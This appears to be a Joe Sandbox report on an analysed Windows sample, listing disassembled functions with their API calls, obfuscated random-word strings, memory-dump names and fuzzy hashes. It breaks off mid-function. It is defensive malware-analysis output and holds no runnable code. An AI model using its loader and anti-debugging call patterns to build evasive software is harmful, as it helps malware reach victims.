string too long, xrefs: 004020D0

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 45d54a01f1f39f78f88cf84de9e82ab4799c477ca39c8fd3c8a0a3bdccddc25f
Instruction ID: 39c992df188607e5b8ddcbc004ec05fc70ad42a912ba76099f8e09e79c6b7508
Opcode Fuzzy Hash: 45d54a01f1f39f78f88cf84de9e82ab4799c477ca39c8fd3c8a0a3bdccddc25f
Instruction Fuzzy Hash: 5B31D4323006105BD7249E5CEA8892BF7E9EB96724B20053FF6819B7D1C7F69C4083A9

Function 00402250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00402266

Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026C8
Part of subcall function 004026B3: __CxxThrowException@8.LIBCMT ref: 004026DD
Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026EE

_memmove.LIBCMT ref: 0040229F

Strings

invalid string position, xrefs: 00402261

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: b56cbde4b5741721c71b416657eb355db1661ea1ddbc07c80a778b71fa99b475
Instruction ID: b532337ec7994005aad34219bb82fd50322612a352a3c812ffe05700ee7ff894
Opcode Fuzzy Hash: b56cbde4b5741721c71b416657eb355db1661ea1ddbc07c80a778b71fa99b475
Instruction Fuzzy Hash: ED01C8313006108BD7259DECEA8892AB3AAAB95714724497FD181DB7C1D6F5DC4283A8

Function 00406F7B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00403F0E: __getptd.LIBCMT ref: 00403F14
Part of subcall function 00403F0E: __getptd.LIBCMT ref: 00403F24

__getptd.LIBCMT ref: 00406F8A

Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D

__getptd.LIBCMT ref: 00406F98

Strings

csm, xrefs: 00406FA6

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: cdc7085df4bdca6dd5cb85aeb7587dd7b0b4bfb9eb8903284afffdbeadc83030
Instruction ID: 50fe1fbb3cba8a88096214dfc38fae97991bbe41bdead42efad8af6b847898c5
Opcode Fuzzy Hash: cdc7085df4bdca6dd5cb85aeb7587dd7b0b4bfb9eb8903284afffdbeadc83030
Instruction Fuzzy Hash: CF014B358006068ADF349F25E4506AEB7B5AF10315F25443FE442763D2CF3999A4DF49

Function 00404868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004048A1,00000000,00000000,00000000,00000000,00000000,0040A0B4,?,004062E8,00000003,004040FC,00000001,00000000,00000000), ref: 00404873
__invoke_watson.LIBCMT ref: 0040488F

Strings

PNv, xrefs: 00404873

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: PNv
API String ID: 4034010525-4070351811
Opcode ID: 03d653105b9490b78c419c36ceb1153564a21bb8c04f1486bee4100b04d653b3
Instruction ID: 3f05b26e2c2f593857254486353de4146da07769d251753da72b248ad5f130c6
Opcode Fuzzy Hash: 03d653105b9490b78c419c36ceb1153564a21bb8c04f1486bee4100b04d653b3
Instruction Fuzzy Hash: F5E08CBA000149BBCF013FA2DC0996A3F2AFB80750B408834FE1490030D636C930DB98

Function 00403B59 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00403B5E
__NMSG_WRITE.LIBCMT ref: 00403B6C

Strings

PNv, xrefs: 00403B5E

Memory Dump Source

Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_dghchav.jbxd

Similarity

API ID: DecodePointer
String ID: PNv
API String ID: 3527080286-4070351811
Opcode ID: 1eeefc6a7b26db4e76b873c9ae92e99a627549591bb141e4449471a95ee55ae7
Instruction ID: 6ffe08d2489e19cafbcafacff543f2e992a29dbeb95095b17cc4da8373e3439c
Opcode Fuzzy Hash: 1eeefc6a7b26db4e76b873c9ae92e99a627549591bb141e4449471a95ee55ae7
Instruction Fuzzy Hash: A9C04CB0B942106AFA103BF65C0B76966259F55B0AF048437BB06B81C2EEFD9624546F

Analysis Process: eihchavPID: 6300, Parent PID: 1068COMMON

Executed Functions

Function 00401840 Relevance: 35.3, APIs: 12, Strings: 8, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_lcreat.KERNEL32(00000000,00000000), ref: 00401E84
_hread.KERNEL32(00000000,00000000,00000000), ref: 00401E8D
GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401E99
GlobalFree.KERNEL32(00000000), ref: 00401EA0
QueryDosDeviceW.KERNEL32(wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez,?,00000000), ref: 00401EB4
_free.LIBCMT ref: 00401EBB

Part of subcall function 004031CD: HeapFree.KERNEL32(00000000,00000000,?,00402C76,?,?,00401021), ref: 004031E3
Part of subcall function 004031CD: GetLastError.KERNEL32(?,?,00402C76,?,?,00401021), ref: 004031F5

Part of subcall function 0040354F: _malloc.LIBCMT ref: 0040355D

Part of subcall function 004033A0: __indefinite.LIBCMT ref: 00405060

__floor_pentium4.LIBCMT ref: 00401EDF
SetFilePointer.KERNELBASE(00000000,5D8DD343,00000000,00000000,3B09B99F,1C76D52B,1A1DACC1,7C3F92FE,660FFCA4,76D4F808,3E8EECA6,07B34857,42B591E9,43C33179,0787356F,7E982BF0), ref: 00401F02
GetTickCount.KERNEL32 ref: 00401F04
GetLastError.KERNEL32 ref: 00401F06
GetCharWidthI.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 00401F37
GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 00401F82

Strings

O$b~, xrefs: 004018EA
wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez, xrefs: 00401EAF
K`:, xrefs: 00401ABF
GxBn, xrefs: 0040184F
J}s`, xrefs: 00401D5C
7-T=, xrefs: 00401DA9
":,x, xrefs: 004019B3
ls/K, xrefs: 00401AAA

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: ErrorFreeLast$CalendarCharCountCurrentDeviceDirectoryFileGlobalHeapInfoPointerQueryTickWidth__floor_pentium4__indefinite_free_hread_lcreat_malloc
String ID: ":,x$7-T=$GxBn$J}s`$K`:$O$b~$ls/K$wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez
API String ID: 796562619-3640916101
Opcode ID: 5b62af958a8a5cfe41154391c2308383ceea0963f1506c16c3cd9f53653e7d45
Instruction ID: 31eeef3b46cfc77afa1b895734239e173ec2656641c401c6440a81c1e53693ed
Opcode Fuzzy Hash: 5b62af958a8a5cfe41154391c2308383ceea0963f1506c16c3cd9f53653e7d45
Instruction Fuzzy Hash: 1EF11EB5609380CFD2648F6AC589B8FFBE4BF85314F10891DEA999B620C7308885CF57

Non-executed Functions

Function 004010E0 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 182
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00401180
GetNumberFormatW.KERNEL32(00000000,00000000,sogudowuwotekonex digimabawer rujusogepisalojar,00000000,?,00000000), ref: 004011DA
GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004011E5
VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004011F8
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00401204
GetStdHandle.KERNEL32(00000000), ref: 0040120C
GetComputerNameW.KERNEL32(?,?), ref: 0040121D
ClearCommBreak.KERNEL32(00000000), ref: 00401225
InterlockedDecrement.KERNEL32(?), ref: 0040122F
EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040123D
GetTempPathA.KERNEL32(00000000,?), ref: 00401248
_memset.LIBCMT ref: 0040125D
CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 0040126D
GetVersionExW.KERNEL32(?), ref: 0040127A
CreateActCtxA.KERNEL32(?), ref: 00401287
InterlockedIncrement.KERNEL32(?), ref: 00401291
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004012A2
EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004012B0
GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 004012BF
SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 004012D8
GlobalWire.KERNEL32(00000000), ref: 004012E0
CreateEventW.KERNEL32(00000000,00000000,00000000,yoyorohexumutuwasetebayuda), ref: 0040131D

Strings

yoyorohexumutuwasetebayuda, xrefs: 00401312
sogudowuwotekonex digimabawer rujusogepisalojar, xrefs: 004011D1
, xrefs: 00401142

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: Info$CalendarCommCreateEnumFileInterlockedNamePathVersion$AttributesBreakClearComputerConfigCopyDecrementDialogDriveEventFormatGlobalHandleIncrementLocaleLogicalMountNumberPointShortStringsTempVerifyVolumeWire_memset
String ID: $sogudowuwotekonex digimabawer rujusogepisalojar$yoyorohexumutuwasetebayuda
API String ID: 4125211919-822714830
Opcode ID: 2da25961e6bd87d3ba8b56aaf714590959185fc7c8f29511d0965fdee03c0e56
Instruction ID: 6e8595c7309441c1fc82682b68bb691d0adf6fcbe2b6dd9454a7df9c2f4daa29
Opcode Fuzzy Hash: 2da25961e6bd87d3ba8b56aaf714590959185fc7c8f29511d0965fdee03c0e56
Instruction Fuzzy Hash: 52716A75E40219AFEB14DFA5DD49B9EB7B4FB48700F108469E608BB2D0C7B46A40CF69

Function 00403FC0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 004078F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040790C
UnhandledExceptionFilter.KERNEL32((HD), ref: 00407917
GetCurrentProcess.KERNEL32(C0000409), ref: 00407933
TerminateProcess.KERNEL32(00000000), ref: 0040793A

Strings

(HD, xrefs: 00407912
z{D, xrefs: 004078EC

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: (HD$z{D
API String ID: 2579439406-143753501
Opcode ID: 0cca4cb3f6c34e2bac765e9ca107058cf167fc74ec1c3ba3081b062c0abda26a
Instruction ID: 7c49ad6c5058463ad118c416b144a0f7b5f21ff1462cb7ffb68cc8e8a676fc82
Opcode Fuzzy Hash: 0cca4cb3f6c34e2bac765e9ca107058cf167fc74ec1c3ba3081b062c0abda26a
Instruction Fuzzy Hash: E321EFBC802204DBD700EF66FD897167BE0BB8A315F11143AE908A73A1EB745981AB4D

Function 00401490 Relevance: 77.3, APIs: 31, Strings: 13, Instructions: 259
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004014C8
GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 004014CE
CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 004014FF
FoldStringW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040150C
EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00401514
CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 0040151E
CreateHardLinkA.KERNEL32(vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga,tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy,00000000), ref: 00401532
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 0040153D
InterlockedDecrement.KERNEL32(?), ref: 00401547
_strlen.LIBCMT ref: 0040155F
LocalAlloc.KERNEL32(00000000,?), ref: 004015B2
LoadLibraryA.KERNEL32(kernel32.dll), ref: 004015C8
GetProcAddress.KERNEL32(00000000,00444BC8), ref: 00401604
GetLastError.KERNEL32(?,?,?,00000000), ref: 00401640
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00401689
GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401693
LoadLibraryA.KERNEL32(00000000), ref: 0040169B
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 004016A9
DebugBreak.KERNEL32(?,?,?,00000000), ref: 004016AF
LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004016ED
SetEnvironmentVariableW.KERNEL32(hiramemepugatipowuzela,venogoricilagudofufoyiz), ref: 004016F9
OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00401701
GetLastError.KERNEL32 ref: 00401720
GetFileAttributesW.KERNEL32(00000000), ref: 0040176E
GetShortPathNameW.KERNEL32(dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler,?,00000000), ref: 0040177E
LocalFlags.KERNEL32(00000000), ref: 00401782
RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040178C
SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040179A
SetComputerNameA.KERNEL32(00000000), ref: 004017A2

Strings

, xrefs: 00401616
jjjj, xrefs: 0040168B
{, xrefs: 00401759
kernel32.dll, xrefs: 004015BE
vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga, xrefs: 0040152D
venogoricilagudofufoyiz, xrefs: 004016EF
jjj, xrefs: 004016E7
Bq , xrefs: 004014D4
gulepulawoboxejobukade, xrefs: 0040154D, 00401568
tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy, xrefs: 00401528
u4j, xrefs: 0040167F
dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler, xrefs: 00401779
hiramemepugatipowuzela, xrefs: 004016F4

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: Create$ErrorFileInterlockedLastLibraryLoadLocalNameOpenString$AddressAllocAttributesBreakCharCodeCompareComputerConsoleCurrentDebugDecrementDiskEnumEnvironmentEventExceptionExchangeFlagsFoldFreeHardHttpInputLinkPagesPathProcProcessRaiseReadShortSpaceSystemTimeVariableWidth32_strlen
String ID: $Bq $dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$gulepulawoboxejobukade$hiramemepugatipowuzela$jjj$jjjj$kernel32.dll$tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy$u4j$venogoricilagudofufoyiz$vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga${
API String ID: 3259815418-1288099099
Opcode ID: ae542ebddf01555bf36e1c4a031898db846896596f30743461f146d0c513f33e
Instruction ID: 7ffd6505b8b07ba356b2f6e5c8a1c1f02ec99392ee5c43898dc611a704e5bb30
Opcode Fuzzy Hash: ae542ebddf01555bf36e1c4a031898db846896596f30743461f146d0c513f33e
Instruction Fuzzy Hash: 2291A0B5944314AFE710AF61ED85B6A7B78FB45709F104939F605B72E0CBB85800CBAD

Function 00405DD6 Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00403A6B), ref: 00405DDE
__mtterm.LIBCMT ref: 00405DEA

Part of subcall function 00405B23: DecodePointer.KERNEL32(00000004,00405F4C,?,00403A6B), ref: 00405B34
Part of subcall function 00405B23: TlsFree.KERNEL32(00000003,00405F4C,?,00403A6B), ref: 00405B4E

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00405E00
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00405E0D
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00405E1A
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00405E27
TlsAlloc.KERNEL32(?,00403A6B), ref: 00405E77
TlsSetValue.KERNEL32(00000000,?,00403A6B), ref: 00405E92
__init_pointers.LIBCMT ref: 00405E9C
EncodePointer.KERNEL32(?,00403A6B), ref: 00405EAD
EncodePointer.KERNEL32(?,00403A6B), ref: 00405EBA
EncodePointer.KERNEL32(?,00403A6B), ref: 00405EC7
EncodePointer.KERNEL32(?,00403A6B), ref: 00405ED4
DecodePointer.KERNEL32(00405CA7,?,00403A6B), ref: 00405EF5
__calloc_crt.LIBCMT ref: 00405F0A
DecodePointer.KERNEL32(00000000,?,00403A6B), ref: 00405F24
__initptd.LIBCMT ref: 00405F2F
GetCurrentThreadId.KERNEL32 ref: 00405F36

Strings

KERNEL32.DLL, xrefs: 00405DD9
FlsGetValue, xrefs: 00405E02
FlsAlloc, xrefs: 00405DFA
PNv, xrefs: 00405EE4
FlsFree, xrefs: 00405E1C
FlsSetValue, xrefs: 00405E0F

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNv
API String ID: 3732613303-2259100434
Opcode ID: 058c4305fbcc8a05b464aad084c638694769c468d8d830ac7ff23fc5814ed724
Instruction ID: 49f715d1ab0fd03b29b3072b70511d18e901dfbf6f68d4dbe0345dc55c82754a
Opcode Fuzzy Hash: 058c4305fbcc8a05b464aad084c638694769c468d8d830ac7ff23fc5814ed724
Instruction Fuzzy Hash: 5F31A035C00611AAE710AF76ED0AE1B7EB4EB0AB51B10093BE450E22E0D73A8515CF9C

Function 00401659 Relevance: 42.1, APIs: 17, Strings: 7, Instructions: 127
librarytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00401689
GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401693
LoadLibraryA.KERNEL32(00000000), ref: 0040169B
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 004016A9
DebugBreak.KERNEL32(?,?,?,00000000), ref: 004016AF
LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004016ED
SetEnvironmentVariableW.KERNEL32(hiramemepugatipowuzela,venogoricilagudofufoyiz), ref: 004016F9
OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00401701
GetLastError.KERNEL32 ref: 00401720
GetFileAttributesW.KERNEL32(00000000), ref: 0040176E
GetShortPathNameW.KERNEL32(dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler,?,00000000), ref: 0040177E
LocalFlags.KERNEL32(00000000), ref: 00401782
RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040178C
SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040179A
SetComputerNameA.KERNEL32(00000000), ref: 004017A2
InterlockedDecrement.KERNEL32(?), ref: 004017B5
LoadLibraryW.KERNEL32(0044DAB0), ref: 0040181C

Strings

jjjj, xrefs: 0040168B
u4j, xrefs: 0040167F
{, xrefs: 00401759
dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler, xrefs: 00401779
venogoricilagudofufoyiz, xrefs: 004016EF
jjj, xrefs: 004016E7
hiramemepugatipowuzela, xrefs: 004016F4

Memory Dump Source

Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_400000_eihchav.jbxd

Similarity

API ID: FileInterlockedLibraryLoadName$AttributesBreakCompareComputerConsoleDebugDecrementDiskEnvironmentErrorEventExceptionExchangeFlagsFreeInputLastLocalOpenPathRaiseReadShortSpaceStringTimeVariable
String ID: dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$hiramemepugatipowuzela$jjj$jjjj$u4j$venogoricilagudofufoyiz${
API String ID: 2963091761-1312479106
Opcode ID: 71b3f7c736db1d8a25b4634da0866dada4237699df8c9a9462adb1db74f73e14
Instruction ID: ed7bc841d4d9f1d649225696c3d2226f5790fb8edf26953cf78d1b09409c4fbc
Opcode Fuzzy Hash: 71b3f7c736db1d8a25b4634da0866dada4237699df8c9a9462adb1db74f73e14
Instruction Fuzzy Hash: A041AC35A48314ABF720ABA1EC46B9A7770FB45B15F104439E705BB6E0CBF42811CBAD

Function 00401360 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 98
pipetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004013BF
CreateJobObjectW.KERNEL32(00000000,zamuloguwatisofobus), ref: 004013C8
